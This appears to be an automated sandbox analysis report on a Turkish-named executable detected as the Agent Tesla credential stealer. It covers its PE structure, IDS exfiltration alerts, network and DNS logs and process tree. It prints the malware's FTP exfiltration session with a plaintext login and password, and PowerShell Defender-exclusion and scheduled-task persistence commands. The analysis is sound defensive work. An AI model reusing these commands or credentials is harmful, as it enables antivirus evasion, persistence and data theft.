                                          IMAGE_DIRECTORY_ENTRY_IMPORT | 0x979c0 | 0x57 | .text
                                          IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x98000 | 0x590 | .rsrc
                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x9a000 | 0xc | .reloc
                                          IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                          IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                          Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                          .text | 0x2000 | 0x95a20 | 0x95c00 | 96440072bf52e2862fc4d348f68d1139 | False | 0.9741137573038398 | data | 7.973890761853698 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                          .rsrc | 0x98000 | 0x590 | 0x600 | d69abbbef33a8bb8e75b6d59e33c3529 | False | 0.4231770833333333 | data | 4.391626965883615 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .reloc | 0x9a000 | 0xc | 0x200 | 7e824d7cfd099b5cefde781cb3c97dc2 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                          Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                          RT_VERSION | 0x980a0 | 0x33c | data | | | 0.4251207729468599
                                          RT_MANIFEST | 0x983dc | 0x1b4 | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (433), with no line terminators | | | 0.5642201834862385
                                          DLL | Import
                                          mscoree.dll | _CorExeMain
                                          Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                          06/27/24-09:16:46.163921 | TCP | 2855542 | ETPRO TROJAN Agent Tesla CnC Exfil Activity | 49706 | 62377 | 192.168.2.5 | 104.247.165.99
                                          06/27/24-09:16:49.864211 | TCP | 2851779 | ETPRO TROJAN Agent Tesla Telegram Exfil | 49708 | 51041 | 192.168.2.5 | 104.247.165.99
                                          06/27/24-09:16:49.864211 | TCP | 2855542 | ETPRO TROJAN Agent Tesla CnC Exfil Activity | 49708 | 51041 | 192.168.2.5 | 104.247.165.99
                                          06/27/24-09:16:46.163921 | TCP | 2851779 | ETPRO TROJAN Agent Tesla Telegram Exfil | 49706 | 62377 | 192.168.2.5 | 104.247.165.99
                                          06/27/24-09:16:49.222300 | TCP | 2029927 | ET TROJAN AgentTesla Exfil via FTP | 49707 | 21 | 192.168.2.5 | 104.247.165.99
                                          06/27/24-09:16:45.532746 | TCP | 2029927 | ET TROJAN AgentTesla Exfil via FTP | 49705 | 21 | 192.168.2.5 | 104.247.165.99
                                          Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                          Jun 27, 2024 09:16:43.551198959 CEST | 49705 | 21 | 192.168.2.5 | 104.247.165.99
                                          Jun 27, 2024 09:16:43.556152105 CEST | 21 | 49705 | 104.247.165.99 | 192.168.2.5
                                          Jun 27, 2024 09:16:43.557033062 CEST | 49705 | 21 | 192.168.2.5 | 104.247.165.99
                                          Jun 27, 2024 09:16:44.167622089 CEST | 21 | 49705 | 104.247.165.99 | 192.168.2.5
                                          Jun 27, 2024 09:16:44.171499968 CEST | 49705 | 21 | 192.168.2.5 | 104.247.165.99
                                          Jun 27, 2024 09:16:44.176255941 CEST | 21 | 49705 | 104.247.165.99 | 192.168.2.5
                                          Jun 27, 2024 09:16:44.387965918 CEST | 21 | 49705 | 104.247.165.99 | 192.168.2.5
                                          Jun 27, 2024 09:16:44.402182102 CEST | 49705 | 21 | 192.168.2.5 | 104.247.165.99
                                          Jun 27, 2024 09:16:44.407018900 CEST | 21 | 49705 | 104.247.165.99 | 192.168.2.5
                                          Jun 27, 2024 09:16:44.655033112 CEST | 21 | 49705 | 104.247.165.99 | 192.168.2.5
                                          Jun 27, 2024 09:16:44.655534029 CEST | 49705 | 21 | 192.168.2.5 | 104.247.165.99
                                          Jun 27, 2024 09:16:44.660388947 CEST | 21 | 49705 | 104.247.165.99 | 192.168.2.5
                                          Jun 27, 2024 09:16:44.875209093 CEST | 21 | 49705 | 104.247.165.99 | 192.168.2.5
                                          Jun 27, 2024 09:16:44.875372887 CEST | 49705 | 21 | 192.168.2.5 | 104.247.165.99
                                          Jun 27, 2024 09:16:44.880362988 CEST | 21 | 49705 | 104.247.165.99 | 192.168.2.5
                                          Jun 27, 2024 09:16:45.092597008 CEST | 21 | 49705 | 104.247.165.99 | 192.168.2.5
                                          Jun 27, 2024 09:16:45.092858076 CEST | 49705 | 21 | 192.168.2.5 | 104.247.165.99
                                          Jun 27, 2024 09:16:45.097764015 CEST | 21 | 49705 | 104.247.165.99 | 192.168.2.5
                                          Jun 27, 2024 09:16:45.309797049 CEST | 21 | 49705 | 104.247.165.99 | 192.168.2.5
                                          Jun 27, 2024 09:16:45.309916019 CEST | 49705 | 21 | 192.168.2.5 | 104.247.165.99
                                          Jun 27, 2024 09:16:45.315133095 CEST | 21 | 49705 | 104.247.165.99 | 192.168.2.5
                                          Jun 27, 2024 09:16:45.526901007 CEST | 21 | 49705 | 104.247.165.99 | 192.168.2.5
                                          Jun 27, 2024 09:16:45.527528048 CEST | 49706 | 62377 | 192.168.2.5 | 104.247.165.99
                                          Jun 27, 2024 09:16:45.532598019 CEST | 62377 | 49706 | 104.247.165.99 | 192.168.2.5
                                          Jun 27, 2024 09:16:45.532685041 CEST | 49706 | 62377 | 192.168.2.5 | 104.247.165.99
                                          Jun 27, 2024 09:16:45.532746077 CEST | 49705 | 21 | 192.168.2.5 | 104.247.165.99
                                          Jun 27, 2024 09:16:45.539473057 CEST | 21 | 49705 | 104.247.165.99 | 192.168.2.5
                                          Jun 27, 2024 09:16:46.162039995 CEST | 21 | 49705 | 104.247.165.99 | 192.168.2.5
                                          Jun 27, 2024 09:16:46.163921118 CEST | 49706 | 62377 | 192.168.2.5 | 104.247.165.99
                                          Jun 27, 2024 09:16:46.163921118 CEST | 49706 | 62377 | 192.168.2.5 | 104.247.165.99
                                          Jun 27, 2024 09:16:46.168899059 CEST | 62377 | 49706 | 104.247.165.99 | 192.168.2.5
                                          Jun 27, 2024 09:16:46.169488907 CEST | 62377 | 49706 | 104.247.165.99 | 192.168.2.5
                                          Jun 27, 2024 09:16:46.169578075 CEST | 49706 | 62377 | 192.168.2.5 | 104.247.165.99
                                          Jun 27, 2024 09:16:46.203802109 CEST | 49705 | 21 | 192.168.2.5 | 104.247.165.99
                                          Jun 27, 2024 09:16:46.392327070 CEST | 21 | 49705 | 104.247.165.99 | 192.168.2.5
                                          Jun 27, 2024 09:16:46.500658989 CEST | 49705 | 21 | 192.168.2.5 | 104.247.165.99
                                          Jun 27, 2024 09:16:47.079363108 CEST | 49707 | 21 | 192.168.2.5 | 104.247.165.99
                                          Jun 27, 2024 09:16:47.194102049 CEST | 21 | 49707 | 104.247.165.99 | 192.168.2.5
                                          Jun 27, 2024 09:16:47.194222927 CEST | 49707 | 21 | 192.168.2.5 | 104.247.165.99
                                          Jun 27, 2024 09:16:47.823898077 CEST | 21 | 49707 | 104.247.165.99 | 192.168.2.5
                                          Jun 27, 2024 09:16:47.827640057 CEST | 49707 | 21 | 192.168.2.5 | 104.247.165.99
                                          Jun 27, 2024 09:16:47.832493067 CEST | 21 | 49707 | 104.247.165.99 | 192.168.2.5
                                          Jun 27, 2024 09:16:48.046286106 CEST | 21 | 49707 | 104.247.165.99 | 192.168.2.5
                                          Jun 27, 2024 09:16:48.046772003 CEST | 49707 | 21 | 192.168.2.5 | 104.247.165.99
                                          Jun 27, 2024 09:16:48.051624060 CEST | 21 | 49707 | 104.247.165.99 | 192.168.2.5
                                          Jun 27, 2024 09:16:48.300241947 CEST | 21 | 49707 | 104.247.165.99 | 192.168.2.5
                                          Jun 27, 2024 09:16:48.300947905 CEST | 49707 | 21 | 192.168.2.5 | 104.247.165.99
                                          Jun 27, 2024 09:16:48.305933952 CEST | 21 | 49707 | 104.247.165.99 | 192.168.2.5
                                          Jun 27, 2024 09:16:48.518785954 CEST | 21 | 49707 | 104.247.165.99 | 192.168.2.5
                                          Jun 27, 2024 09:16:48.542098999 CEST | 49707 | 21 | 192.168.2.5 | 104.247.165.99
                                          Jun 27, 2024 09:16:48.547076941 CEST | 21 | 49707 | 104.247.165.99 | 192.168.2.5
                                          Jun 27, 2024 09:16:48.760163069 CEST | 21 | 49707 | 104.247.165.99 | 192.168.2.5
                                          Jun 27, 2024 09:16:48.763032913 CEST | 49707 | 21 | 192.168.2.5 | 104.247.165.99
                                          Jun 27, 2024 09:16:48.767927885 CEST | 21 | 49707 | 104.247.165.99 | 192.168.2.5
                                          Jun 27, 2024 09:16:48.981028080 CEST | 21 | 49707 | 104.247.165.99 | 192.168.2.5
                                          Jun 27, 2024 09:16:48.982683897 CEST | 49707 | 21 | 192.168.2.5 | 104.247.165.99
                                          Jun 27, 2024 09:16:48.987554073 CEST | 21 | 49707 | 104.247.165.99 | 192.168.2.5
                                          Jun 27, 2024 09:16:49.200829983 CEST | 21 | 49707 | 104.247.165.99 | 192.168.2.5
                                          Jun 27, 2024 09:16:49.216226101 CEST | 49708 | 51041 | 192.168.2.5 | 104.247.165.99
                                          Jun 27, 2024 09:16:49.221257925 CEST | 51041 | 49708 | 104.247.165.99 | 192.168.2.5
                                          Jun 27, 2024 09:16:49.221358061 CEST | 49708 | 51041 | 192.168.2.5 | 104.247.165.99
                                          Jun 27, 2024 09:16:49.222300053 CEST | 49707 | 21 | 192.168.2.5 | 104.247.165.99
                                          Jun 27, 2024 09:16:49.231053114 CEST | 21 | 49707 | 104.247.165.99 | 192.168.2.5
                                          Jun 27, 2024 09:16:49.863991022 CEST | 21 | 49707 | 104.247.165.99 | 192.168.2.5
                                          Jun 27, 2024 09:16:49.864211082 CEST | 49708 | 51041 | 192.168.2.5 | 104.247.165.99
                                          Jun 27, 2024 09:16:49.864278078 CEST | 49708 | 51041 | 192.168.2.5 | 104.247.165.99
                                          Jun 27, 2024 09:16:49.869143009 CEST | 51041 | 49708 | 104.247.165.99 | 192.168.2.5
                                          Jun 27, 2024 09:16:49.869420052 CEST | 51041 | 49708 | 104.247.165.99 | 192.168.2.5
                                          Jun 27, 2024 09:16:49.869468927 CEST | 49708 | 51041 | 192.168.2.5 | 104.247.165.99
                                          Jun 27, 2024 09:16:50.000675917 CEST | 49707 | 21 | 192.168.2.5 | 104.247.165.99
                                          Jun 27, 2024 09:16:50.086592913 CEST | 21 | 49707 | 104.247.165.99 | 192.168.2.5
                                          Jun 27, 2024 09:16:50.180342913 CEST | 49707 | 21 | 192.168.2.5 | 104.247.165.99
                                          Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                          Jun 27, 2024 09:16:43.511660099 CEST | 59276 | 53 | 192.168.2.5 | 1.1.1.1
                                          Jun 27, 2024 09:16:43.543075085 CEST | 53 | 59276 | 1.1.1.1 | 192.168.2.5
                                          Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                          Jun 27, 2024 09:16:43.511660099 CEST | 192.168.2.5 | 1.1.1.1 | 0xf1ad | Standard query (0) | ftp.normagroup.com.tr | A (IP address) | IN (0x0001) | false
                                          Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                          Jun 27, 2024 09:16:43.543075085 CEST | 1.1.1.1 | 192.168.2.5 | 0xf1ad | No error (0) | ftp.normagroup.com.tr | | 104.247.165.99 | A (IP address) | IN (0x0001) | false
                                          Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
                                          Jun 27, 2024 09:16:44.167622089 CEST | 21 | 49705 | 104.247.165.99 | 192.168.2.5 | 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                                                                                                                220-You are user number 11 of 50 allowed.
                                                                                                                                220-Local time is now 10:16. Server port: 21.
                                                                                                                                220-This is a private system - No anonymous login
                                                                                                                                220-IPv6 connections are also welcome on this server.
                                                                                                                                220 You will be disconnected after 15 minutes of inactivity.
                                          Jun 27, 2024 09:16:44.171499968 CEST | 49705 | 21 | 192.168.2.5 | 104.247.165.99 | USER admins@normagroup.com.tr
                                          Jun 27, 2024 09:16:44.387965918 CEST | 21 | 49705 | 104.247.165.99 | 192.168.2.5 | 331 User admins@normagroup.com.tr OK. Password required
                                          Jun 27, 2024 09:16:44.402182102 CEST | 49705 | 21 | 192.168.2.5 | 104.247.165.99 | PASS ab+LNvim5PAo
                                          Jun 27, 2024 09:16:44.655033112 CEST | 21 | 49705 | 104.247.165.99 | 192.168.2.5 | 230 OK. Current restricted directory is /
                                          Jun 27, 2024 09:16:44.875209093 CEST | 21 | 49705 | 104.247.165.99 | 192.168.2.5 | 504 Unknown command
                                          Jun 27, 2024 09:16:44.875372887 CEST | 49705 | 21 | 192.168.2.5 | 104.247.165.99 | PWD
                                          Jun 27, 2024 09:16:45.092597008 CEST | 21 | 49705 | 104.247.165.99 | 192.168.2.5 | 257 "/" is your current location
                                          Jun 27, 2024 09:16:45.092858076 CEST | 49705 | 21 | 192.168.2.5 | 104.247.165.99 | TYPE I
                                          Jun 27, 2024 09:16:45.309797049 CEST | 21 | 49705 | 104.247.165.99 | 192.168.2.5 | 200 TYPE is now 8-bit binary
                                          Jun 27, 2024 09:16:45.309916019 CEST | 49705 | 21 | 192.168.2.5 | 104.247.165.99 | PASV
                                          Jun 27, 2024 09:16:45.526901007 CEST | 21 | 49705 | 104.247.165.99 | 192.168.2.5 | 227 Entering Passive Mode (104,247,165,99,243,169)
                                          Jun 27, 2024 09:16:45.532746077 CEST | 49705 | 21 | 192.168.2.5 | 104.247.165.99 | STOR PW_user-960781_2024_06_27_03_16_42.html
                                          Jun 27, 2024 09:16:46.162039995 CEST | 21 | 49705 | 104.247.165.99 | 192.168.2.5 | 150 Accepted data connection
                                          Jun 27, 2024 09:16:46.392327070 CEST | 21 | 49705 | 104.247.165.99 | 192.168.2.5 | 226-File successfully transferred
                                                                                                                                226 0.230 seconds (measured here), 1.36 Kbytes per second
                                          Jun 27, 2024 09:16:47.823898077 CEST | 21 | 49707 | 104.247.165.99 | 192.168.2.5 | 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                                                                                                                220-You are user number 12 of 50 allowed.
                                                                                                                                220-Local time is now 10:16. Server port: 21.
                                                                                                                                220-This is a private system - No anonymous login
                                                                                                                                220-IPv6 connections are also welcome on this server.
                                                                                                                                220 You will be disconnected after 15 minutes of inactivity.
                                          Jun 27, 2024 09:16:47.827640057 CEST | 49707 | 21 | 192.168.2.5 | 104.247.165.99 | USER admins@normagroup.com.tr
                                          Jun 27, 2024 09:16:48.046286106 CEST | 21 | 49707 | 104.247.165.99 | 192.168.2.5 | 331 User admins@normagroup.com.tr OK. Password required
                                          Jun 27, 2024 09:16:48.046772003 CEST | 49707 | 21 | 192.168.2.5 | 104.247.165.99 | PASS ab+LNvim5PAo
                                          Jun 27, 2024 09:16:48.300241947 CEST | 21 | 49707 | 104.247.165.99 | 192.168.2.5 | 230 OK. Current restricted directory is /
                                          Jun 27, 2024 09:16:48.518785954 CEST | 21 | 49707 | 104.247.165.99 | 192.168.2.5 | 504 Unknown command
                                          Jun 27, 2024 09:16:48.542098999 CEST | 49707 | 21 | 192.168.2.5 | 104.247.165.99 | PWD
                                          Jun 27, 2024 09:16:48.760163069 CEST | 21 | 49707 | 104.247.165.99 | 192.168.2.5 | 257 "/" is your current location
                                          Jun 27, 2024 09:16:48.763032913 CEST | 49707 | 21 | 192.168.2.5 | 104.247.165.99 | TYPE I
                                          Jun 27, 2024 09:16:48.981028080 CEST | 21 | 49707 | 104.247.165.99 | 192.168.2.5 | 200 TYPE is now 8-bit binary
                                          Jun 27, 2024 09:16:48.982683897 CEST | 49707 | 21 | 192.168.2.5 | 104.247.165.99 | PASV
                                          Jun 27, 2024 09:16:49.200829983 CEST | 21 | 49707 | 104.247.165.99 | 192.168.2.5 | 227 Entering Passive Mode (104,247,165,99,199,97)
                                          Jun 27, 2024 09:16:49.222300053 CEST | 49707 | 21 | 192.168.2.5 | 104.247.165.99 | STOR PW_user-960781_2024_06_27_03_16_45.html
                                          Jun 27, 2024 09:16:49.863991022 CEST | 21 | 49707 | 104.247.165.99 | 192.168.2.5 | 150 Accepted data connection
                                          Jun 27, 2024 09:16:50.086592913 CEST | 21 | 49707 | 104.247.165.99 | 192.168.2.5 | 226-File successfully transferred
                                                                                                                                226 0.222 seconds (measured here), 1.41 Kbytes per second

                                          Target ID:0
                                          Start time:03:16:38
                                          Start date:27/06/2024
                                          Path:C:\Users\user\Desktop\hesaphareketi-.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\Desktop\hesaphareketi-.exe"
                                          Imagebase:0x80000
                                          File size:615'936 bytes
                                          MD5 hash:D8AA0C3EAED283B8D78298748900F395
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2069027456.0000000003474000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2069027456.0000000003474000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:low
                                          Has exited:true

                                          Target ID:2
                                          Start time:03:16:39
                                          Start date:27/06/2024
                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi-.exe"
                                          Imagebase:0x970000
                                          File size:433'152 bytes
                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:3
                                          Start time:03:16:39
                                          Start date:27/06/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:4
                                          Start time:03:16:39
                                          Start date:27/06/2024
                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe"
                                          Imagebase:0x970000
                                          File size:433'152 bytes
                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:5
                                          Start time:03:16:39
                                          Start date:27/06/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:6
                                          Start time:03:16:40
                                          Start date:27/06/2024
                                          Path:C:\Windows\SysWOW64\schtasks.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xyodEPhulIrkY" /XML "C:\Users\user\AppData\Local\Temp\tmpE555.tmp"
                                          Imagebase:0x730000
                                          File size:187'904 bytes
                                          MD5 hash:48C2FE20575769DE916F48EF0676A965
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:7
                                          Start time:03:16:40
                                          Start date:27/06/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:8
                                          Start time:03:16:41
                                          Start date:27/06/2024
                                          Path:C:\Users\user\Desktop\hesaphareketi-.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\Desktop\hesaphareketi-.exe"
                                          Imagebase:0xcd0000
                                          File size:615'936 bytes
                                          MD5 hash:D8AA0C3EAED283B8D78298748900F395
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.4487969528.0000000000403000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.4487969528.0000000000403000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.4492018819.000000000304E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.4492018819.0000000003001000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.4492018819.0000000003001000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:low
                                          Has exited:false

                                          Target ID:9
                                          Start time:03:16:41
                                          Start date:27/06/2024
                                          Path:C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe
                                          Imagebase:0x280000
                                          File size:615'936 bytes
                                          MD5 hash:D8AA0C3EAED283B8D78298748900F395
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.2100310326.0000000003645000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2100310326.0000000003645000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          Antivirus matches:
                                          • Detection: 100%, Avira
                                          • Detection: 100%, Joe Sandbox ML
                                          • Detection: 53%, ReversingLabs
                                          Reputation:low
                                          Has exited:true

                                          Target ID:10
                                          Start time:03:16:43
                                          Start date:27/06/2024
                                          Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                          Imagebase:0x7ff6ef0c0000
                                          File size:496'640 bytes
                                          MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                          Has elevated privileges:true
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:11
                                          Start time:03:16:44
                                          Start date:27/06/2024
                                          Path:C:\Windows\SysWOW64\schtasks.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xyodEPhulIrkY" /XML "C:\Users\user\AppData\Local\Temp\tmpBF7D.tmp"
                                          Imagebase:0x730000
                                          File size:187'904 bytes
                                          MD5 hash:48C2FE20575769DE916F48EF0676A965
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:12
                                          Start time:03:16:44
                                          Start date:27/06/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:13
                                          Start time:03:16:45
                                          Start date:27/06/2024
                                          Path:C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe"
                                          Imagebase:0x830000
                                          File size:615'936 bytes
                                          MD5 hash:D8AA0C3EAED283B8D78298748900F395
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000D.00000002.4492600143.0000000002CFE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000002.4492600143.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000D.00000002.4492600143.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:low
                                          Has exited:false

                                            Execution Graph

                                            Execution Coverage:11.8%
                                            Dynamic/Decrypted Code Coverage:100%
                                            Signature Coverage:0%
                                            Total number of Nodes:143
                                            Total number of Limit Nodes:6

                                            Control-flow Graph

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2071884045.00000000049B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_49b0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LR]q$LR]q$\s]q
                                            • API String ID: 0-1846294405
                                            • Opcode ID: 33c297fc9e70cc4a08bf777415b21b59af8744c7a7508fdbf56b989b1e9100b7
                                            • Instruction ID: cad40d1236ad9a8066846accadf07a81b9890b6cd4d9e16fb02a45200394c2a7
                                            • Opcode Fuzzy Hash: 33c297fc9e70cc4a08bf777415b21b59af8744c7a7508fdbf56b989b1e9100b7
                                            • Instruction Fuzzy Hash: 6A828E35A102198FCB14CFA9D984AADB7F2FFC9300F15C6A9E059EB355DB34A941CB90

                                            Control-flow Graph
                                            • Blocks 49b71fe-49b802a, entry block 49b71fe-49b7274; no API calls labelled in the graph; calls to 49b83d1 / 49b8330 / 49b8320 from block 49b7669 and to 49b8c41 / 49b8c50 from block 49b76f5
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2071884045.00000000049B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_49b0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LR]q$\s]q
                                            • API String ID: 0-2162871153
                                            • Opcode ID: daef5a14c93e0b380006168b414ece10bd99472483f8da009d8bada7f3bb46d3
                                            • Instruction ID: 647b07e7220de593dfa0f952d8e95c5486566fe02cea5a0cf3c8a748d6d4c98f
                                            • Opcode Fuzzy Hash: daef5a14c93e0b380006168b414ece10bd99472483f8da009d8bada7f3bb46d3
                                            • Instruction Fuzzy Hash: 30D16E35E1121A8FDB14DF69D980AAEB7F2FFC8305F158669D406EB354DB34A902CB90

                                            Control-flow Graph
                                            • Blocks 49b724a-49b802a, entry block 49b724a-49b7260; no API calls labelled in the graph; calls to 49b83d1 / 49b8330 / 49b8320 from block 49b7669 and to 49b8c41 / 49b8c50 from block 49b76f5
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2071884045.00000000049B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_49b0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LR]q$\s]q
                                            • API String ID: 0-2162871153
